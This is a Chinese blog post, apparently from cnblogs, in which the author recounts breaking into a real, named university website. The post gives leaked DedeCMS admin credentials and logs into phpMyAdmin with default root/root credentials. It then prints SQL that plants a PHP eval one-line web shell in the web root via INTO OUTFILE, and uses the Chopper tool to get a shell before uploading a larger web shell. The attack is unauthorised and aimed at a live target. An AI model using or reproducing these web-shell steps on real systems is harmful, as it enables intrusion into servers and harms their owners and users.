zoukankan      html  css  js  c++  java
  • 渗透笔记0x00

    今天朋友在入侵织梦的网站系统,通过最新的Exp获得了织梦后台的账号和密码

    账号:admin

    密码:abc123456

    但是,找来找去找不到后台,就让我提权试试。

    我看了下:http://pxc.ncist.edu.cn/dede/

    后台被删除了!怎么办??

    google hack也没找到后台

    后来,我试了试这个网站:http://zsjy.ncist.edu.cn/phpmyadmin

    输入默认MySql账号与密码:

    账号:root

    密码:root

    居然进去了:

    接下来就是phpmyadmin提权了:

    我的思路是:

    1.先爆出php服务器www的路径

    2.然后通过将php一句话插入数据库再导出到www路径

    通过google hack爆到路径:Dwww

    呵呵,接下来就执行sql语句:

    CREATE TABLE `mysql`.`xss` (`xss1` TEXT NOT NULL );

    INSERT INTO `mysql`.`xss` (`xss1` ) VALUES ('<?php @eval($_POST[milantgh])?>');

    SELECT xss1 FROM `mysql`.`xss` INTO OUTFILE 'd:/www/x.php';

    这段sql意思是:

    1.在mysql数据库中建一张表叫xss,在xss表中生成一个field(字段)叫xss1

    2.将php一句话木马插入数据库中的xss1字段处

    3.将数据库中xss1字段的内容导出到d:wwwx.php文件中

    这下,通过chopper连接x.php小马得到shell:

     接下来,上传一个php大马spider.php

    通过FF连接spider.php:

    成功获得webshell!!!

  • 相关阅读:
    优化正则表达式的诀窍
    C#中的正则表达式
    正则表达式-- 零宽断言与懒惰匹配以及平衡组
    Match类
    RegexOptions枚举
    Regex类
    正则表达式-- 元字符
    正则表达式30分钟入门教程
    StreamReader与StreamWriter
    When do we pass arguments by reference or pointer?
  • 原文地址:https://www.cnblogs.com/milantgh/p/3638732.html
Copyright © 2011-2022 走看看